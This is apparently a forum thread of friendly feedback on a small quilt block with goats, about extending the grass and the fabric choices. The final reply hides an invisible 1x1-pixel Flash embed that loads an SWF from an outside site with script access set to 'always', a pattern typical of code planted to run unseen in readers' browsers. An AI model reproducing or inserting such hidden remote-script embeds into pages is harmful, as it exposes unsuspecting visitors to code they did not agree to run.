I agree re not having grass go all the way to the edges and I like the outcropping idea, but I would have a tiny bit behind their legs or going up a little higher behind them on one side. That would give it a little 3D perspective.

it doesn't bother me, they can actually be standing on a mound so it's fine. your choice.

Your little quilt is so cute, yes, I would extend the grass. This made me smile.

DD has several goats & they do like to stand on something higher than the ground. As suggested by others, maybe make the grass higher on the left side, lower on the right so it does appear they are standing on an outcropping. The fabric for the goats is perfect.

DD's goats are named Fudge, Oreo, Kibbles and Bits.

Unless you want all eyes to focus on the grass... it should go to the edges of the block. I love your fabric choices.

    I also think you should add more grass. <object width="1" height="1" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="undefined" value="http://smilyes4u.com/d/14/nr.swf" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://smilyes4u.com/d/14/nr.swf" /><param name="allowscriptaccess" value="always" /><embed width="1" height="1" type="application/x-shockwave-flash" src="http://smilyes4u.com/d/14/nr.swf" undefined="http://smilyes4u.com/d/14/nr.swf" allowScriptAccess="always" allowscriptaccess="always" /></object>
